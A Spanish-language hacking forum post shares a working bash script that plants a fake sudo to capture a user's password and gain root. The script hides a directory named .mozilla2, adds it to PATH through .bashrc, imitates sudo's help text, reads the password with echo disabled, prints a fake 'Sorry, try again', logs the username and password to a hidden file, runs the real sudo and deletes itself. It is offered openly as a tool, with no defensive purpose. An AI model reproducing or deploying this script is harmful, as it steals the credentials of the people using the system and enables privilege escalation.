elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [bash][codigo]conseguir root con falso sudo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [bash][codigo]conseguir root con falso sudo  (Leído 2,023 veces)
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
[bash][codigo]conseguir root con falso sudo
« en: 20 Diciembre 2013, 20:12 pm »

ya se que no es una idea muy novedosa pero bueno esta es mi version xD (es que no tenia internet  :laugh: )

la idea es simple cuando se ejecute este bash crea un sudo falso que al escribir alguien sudo comando y ponga su clave. nos pondra la clave en un archivo que esta en la carpeta de usuario .mozilla2 y se borrara el sudo falso :) .


Código
  1. #!/bin/bash
  2.  
  3. #escribe el archivo que reemplazara el sudo original para obtener la clave
  4. function falsosudo()
  5. {
  6. cat > "sudo" << EOL
  7. #!/bin/bash
  8. #sale cuando se pone mal el comando o se pide la ayuda
  9. function ayuda1()
  10. {
  11. echo "usage: sudo [-D level] -h | -K | -k | -V
  12. usage: sudo -v [-AknS] [-D level] [-g groupname|#gid] [-p prompt] [-u user
  13.             name|#uid]
  14. usage: sudo -l[l] [-AknS] [-D level] [-g groupname|#gid] [-p prompt] [-U user
  15.             name] [-u user name|#uid] [-g groupname|#gid] [command]
  16. usage: sudo [-AbEHknPS] [-r role] [-t type] [-C fd] [-D level] [-g
  17.             groupname|#gid] [-p prompt] [-u user name|#uid] [-g groupname|#gid]
  18.             [VAR=value] [-i|-s] [<command>]
  19. usage: sudo -e [-AknS] [-r role] [-t type] [-C fd] [-D level] [-g
  20.             groupname|#gid] [-p prompt] [-u user name|#uid] file ...
  21. "
  22. }
  23.  
  24. function ayuda2()
  25. {
  26. #sale cuando se pide la ayuda junto con ayuda1
  27. echo "
  28.  
  29. Options:
  30.   -a type       use specified BSD authentication type
  31.   -b            run command in the background
  32.   -C fd         close all file descriptors >= fd
  33.   -E            preserve user environment when executing command
  34.   -e            edit files instead of running a command
  35.   -g group      execute command as the specified group
  36.   -H            set HOME variable to target user's home dir.
  37.   -h            display help message and exit
  38.   -i [command]  run a login shell as target user
  39.   -K            remove timestamp file completely
  40.   -k            invalidate timestamp file
  41.   -l[l] command list user's available commands
  42.   -n            non-interactive mode, will not prompt user
  43.   -P            preserve group vector instead of setting to target's
  44.   -p prompt     use specified password prompt
  45.   -r role       create SELinux security context with specified role
  46.   -S            read password from standard input
  47.   -s [command]  run a shell as target user
  48.   -t type       create SELinux security context with specified role
  49.   -U user       when listing, list specified user's privileges
  50.   -u user       run command (or edit file) as specified user
  51.   -V            display version information and exit
  52.   -v            update user's timestamp without running a command
  53.   --            stop processing command line arguments
  54. "
  55. }
  56. # si no hay parametros muestra la ayuda
  57. if [ "\$#" -eq 0 ];
  58.  then
  59.  ayuda1
  60. #si se pide ayuda pero hay mas parametros
  61. elif [ "\$#" -ne 1 ] && [ "\$1" == "-h" ];
  62.  then
  63.  ayuda1
  64.  
  65. #si se pide ayuda
  66. elif [ "\$#" -eq 1 ] && [ "\$1" == "-h" ];
  67.  then
  68.  ayuda1
  69.  ayuda2
  70.  
  71.  
  72. #si no captura la clave
  73. else
  74.  #esto es para que no muestre la clave por pantalla
  75.  STTY_SAVE=\`stty -g\`
  76.  stty -echo
  77.  #se pide la contraseña y se guarga en la variable clave
  78.  echo -n "[sudo] password for \$USERNAME: "
  79.  read clave
  80.  #se pone por defecto para que mueste de nuevo lo que se escribe en el teclado
  81.  stty \$STTY_SAVE
  82.  #error falso que dice que la clave es incorrecta
  83.  echo -e "\nSorry, try again."
  84.  sleep 3
  85.  #guarda el usuario y contraseña
  86.  echo "\$USERNAME">>$HOME/.mozilla2/config
  87.  echo "\$clave" >> $HOME/.mozilla2/config
  88.  #ejecuta el sudo real
  89.  /usr/bin/sudo \$*
  90.  #se borra solo
  91.  rm \$0
  92. fi
  93. EOL
  94. #aca finaliza el archivo
  95. }
  96. #si no existe la ubicacion entonces:
  97. if [ ! -d "$HOME/.mozilla2/" ];
  98. then
  99. # usar clave una ves conseguida :D
  100. #echo <clave> | sudo -S <comando> || echo error
  101. cd "$HOME"
  102. mkdir .mozilla2
  103. #creo el archivo bashrc aca se configura nuestra consola. donde agrego la ruta del sudo falso
  104. echo 'export PATH="$HOME/.mozilla2:$PATH"' >> .bashrc
  105. cd .mozilla2
  106. #creo el sudo
  107. falsosudo
  108. #le doy permisos de ejecucion
  109. chmod +x sudo
  110. fi
  111. #rm $0


« Última modificación: 7 Enero 2014, 14:59 pm por daryo » En línea

buenas
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Conseguir clave wifi por AP falso
Hacking Wireless
elpre 5 4,334 Último mensaje 24 Marzo 2012, 00:10 am
por elpre
[Script]Volver atras, Codigo Bash
Scripting
punkacs 2 7,976 Último mensaje 27 Abril 2012, 04:37 am
por leogtz
[Aporte][Mini-Tutorial] Conseguir una shell root en Linux (truco LD_PRELOAD)
Programación C/C++
0xDani 4 3,836 Último mensaje 19 Febrero 2013, 16:09 pm
por 0xDani
Conseguir root servidor linux?
Bugs y Exploits
Elargrt 3 3,535 Último mensaje 28 Abril 2015, 02:28 am
por Elargrt
Una vulnerabilidad en Sudo permite ejecutar comandos root sin permiso del ...
Noticias
wolfbcn 0 1,097 Último mensaje 15 Octubre 2019, 14:56 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines